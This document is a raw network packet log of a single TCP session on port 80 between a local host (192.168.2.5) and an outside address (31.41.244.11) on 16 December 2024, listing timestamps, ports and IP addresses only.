Dec 16, 2024 11:03:21.904978037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.906085014 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.906186104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.906204939 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.906234980 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.907236099 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.907291889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.907346964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.907388926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.908354998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.908411026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.908469915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.908530951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.909518003 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.909574032 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.909606934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.909656048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.910680056 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.910736084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.910795927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.910847902 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.911823034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.911890030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.911941051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.911993980 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.913018942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.913053989 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.913083076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.913100004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.914133072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.914191008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.051938057 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.052001953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.052074909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.052467108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.052490950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.052515984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.052541971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.053396940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.053457022 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.053510904 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.053559065 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.054465055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.054510117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.054560900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.054617882 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.055635929 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.055704117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.055759907 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.055804968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.056770086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.056854010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.056865931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.056909084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.058002949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.058058977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.058121920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.058484077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.059134960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.059197903 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.059262037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.059433937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.060267925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.060324907 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.060380936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.060431957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.061408997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.061533928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.061588049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.062570095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.062627077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.062686920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.062740088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.063855886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.063914061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.063980103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.064032078 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.065005064 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.065041065 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.065056086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.065083027 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.066050053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.066107988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.066234112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.066288948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.067198992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.067306042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.067347050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.067397118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.071049929 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.071108103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.071269035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.071307898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.071325064 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.071356058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.071360111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.071396112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.071410894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.071432114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.071450949 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.071487904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.071885109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.071938038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.071990967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.072040081 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.073012114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.073092937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.073148012 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.074141979 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.074197054 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.074259043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.074307919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.075375080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.075429916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.075514078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.075563908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.078515053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.078571081 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.078569889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.078608990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.078623056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.078658104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.078711033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.078759909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.081832886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.081885099 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.081923008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.081939936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.081958055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.081965923 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.081995964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.082000971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.082036018 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.082042933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.082083941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.088037014 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.088156939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.088253975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.088270903 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.088291883 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.088298082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.088335991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.088349104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.088382959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.088388920 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.088418007 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.088433981 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.088454962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.088468075 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.088490009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.088505030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.088529110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.088534117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.088579893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.088620901 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.088659048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.088670969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.088706017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.089442968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.089499950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.089504004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.089546919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.090632915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.090691090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.090759039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.091523886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.091582060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.091619015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.091670036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.092643023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.092700958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.092716932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.092763901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.093802929 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.093866110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.093936920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.093986034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.095010996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.095066071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.095133066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.095184088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.096159935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.096215010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.096271992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.096323967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.097332954 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.097495079 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.097553015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.098504066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.098618031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.098623991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.098664045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.099555969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.099611998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.099678993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.099728107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.100739956 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.100789070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.100861073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.100910902 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.101875067 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.101932049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.102018118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.102067947 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.103298903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.103369951 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.103424072 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.104188919 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.104247093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.104315042 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.104363918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.105367899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.105421066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.105484962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.105535030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.106659889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.106697083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.106755018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.107661009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.107712984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.107784033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.107829094 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.108814955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.108917952 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.108920097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.108969927 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.110043049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.110111952 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.110166073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.111145020 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.111198902 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.111279964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.111394882 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.112350941 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.114826918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.243880987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.243944883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.244002104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.244050980 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.244429111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.244482994 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.244551897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.244616032 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.245579958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.245635033 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.245734930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.245784998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.246799946 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.246850967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.246869087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.246917009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.247971058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.248025894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.248066902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.248114109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.249063015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.249109030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.249166012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.249244928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.250217915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.250267029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.250304937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.250354052 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.251344919 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.251477957 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.251542091 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.251668930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.252511024 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.252567053 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.252599955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.252645016 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.253669977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.253745079 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.253782988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.253825903 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.254829884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.254879951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.254934072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.254988909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.256014109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.256071091 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.256089926 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.256134987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.257117033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.257169008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.257217884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.257266045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.258323908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.258378029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.258443117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.258493900 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.259474039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.259529114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.259601116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.259650946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.260639906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.260691881 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.260721922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.260773897 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.261770964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.261825085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.261944056 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.262001991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.262948036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.262999058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.263062000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.263113976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.264126062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.264178991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.264245987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.264297009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.265273094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.265326977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.265393972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.265448093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.266422987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.266475916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.266604900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.266658068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.267527103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.267638922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.267640114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.267694950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.268718004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.268771887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.268852949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.268906116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.269915104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.269965887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.269969940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.270020962 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.271030903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.271084070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.271151066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.271203041 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.272248983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.272300959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.272330046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.272382975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.273390055 CET	80	49800	31.41.244.11	192.168.2.5
